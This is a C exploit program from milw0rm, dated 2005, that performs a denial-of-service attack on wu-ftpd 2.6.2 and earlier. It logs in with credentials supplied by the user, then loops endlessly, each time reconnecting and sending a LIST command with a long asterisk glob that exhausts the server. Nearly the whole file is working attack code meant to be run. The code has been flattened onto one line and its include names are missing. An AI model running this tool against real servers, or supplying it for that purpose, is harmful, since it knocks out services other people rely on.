/* * wu-ftpd <= 2.6.2 File Globbing DoS * str0ke@milw0rm.com * * Advisory: http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities&flashstatus=true * * Adam Zabrocki (pi3 / pi3ki31ny) is credited with this discovery. */ #include #include #include #include #include #include #include #define SERVER_PORT 21 usage(char *name) { printf("usage: %s -h hostname/ip -u user -p passwd\n",name); printf("\t\t/str0ke!milw0rm.com wu-ftpd <= 2.6.2 File Globbing DoS\n"); exit(0); } main(int argc, char *argv[]) { char buffer[1000],host[255],user[255],pass[255],c; int sd, rc, i=0; struct sockaddr_in localAddr, servAddr; struct hostent *h; if ( argc < 3) { usage(argv[0]); } while ((c = getopt (argc, argv, "h:u:p:")) != EOF) switch(c) { case 'h': strncpy(host,optarg,sizeof(host)); break; case 'u': strncpy(user,optarg,sizeof(user)); break; case 'p': strncpy(pass,optarg,sizeof(pass)); break; } while(1) { h = gethostbyname(host); if(h==NULL) { printf("unknown host '%s'\n",host); exit(1); } servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(SERVER_PORT); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("cannot open socket "); exit(1); } localAddr.sin_family = AF_INET; localAddr.sin_addr.s_addr = htonl(INADDR_ANY); localAddr.sin_port = htons(0); rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); if(rc<0) { printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT); perror("error "); exit(1); } printf("Trying To Connect To [%s]\n",host); rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("cannot connect "); exit(1); } printf("Trying Login With [%s]\n",user); snprintf(buffer,sizeof(buffer), "USER %s\r\n", user); rc = send(sd, buffer, strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); while(1) { rc=recv(sd,buffer,sizeof(buffer),0); if(strstr(buffer,"331")) break; if(strstr(buffer,"421")) { printf("Access Denied on your arse..\n"); exit(0); } } printf("Sending Pass - [%s]\n",pass); memset(buffer,0,sizeof(buffer)); snprintf(buffer,sizeof(buffer), "PASS %s\r\n", pass); rc = send(sd,buffer, strlen(buffer), 0); while(1) { rc=recv(sd,buffer,sizeof(buffer),0); if(strstr(buffer,"230")) break; if(strstr(buffer,"421")) { printf("Access Denied on your arse..\n"); exit(0); } if(strstr(buffer,"530")) { printf("Access Denied: Login Incorrect!\n"); exit(0); } } memset(buffer,0,sizeof(buffer)); snprintf(buffer,sizeof(buffer), "LIST ***********************************************************************************************************************************************************************************************.*\r\n"); rc = send(sd,buffer, strlen(buffer), 0); printf("Dos Sent\n"); } if(rc<0) { perror("cannot send data "); close(sd); exit(1); } return 0; } // milw0rm.com [2005-02-25]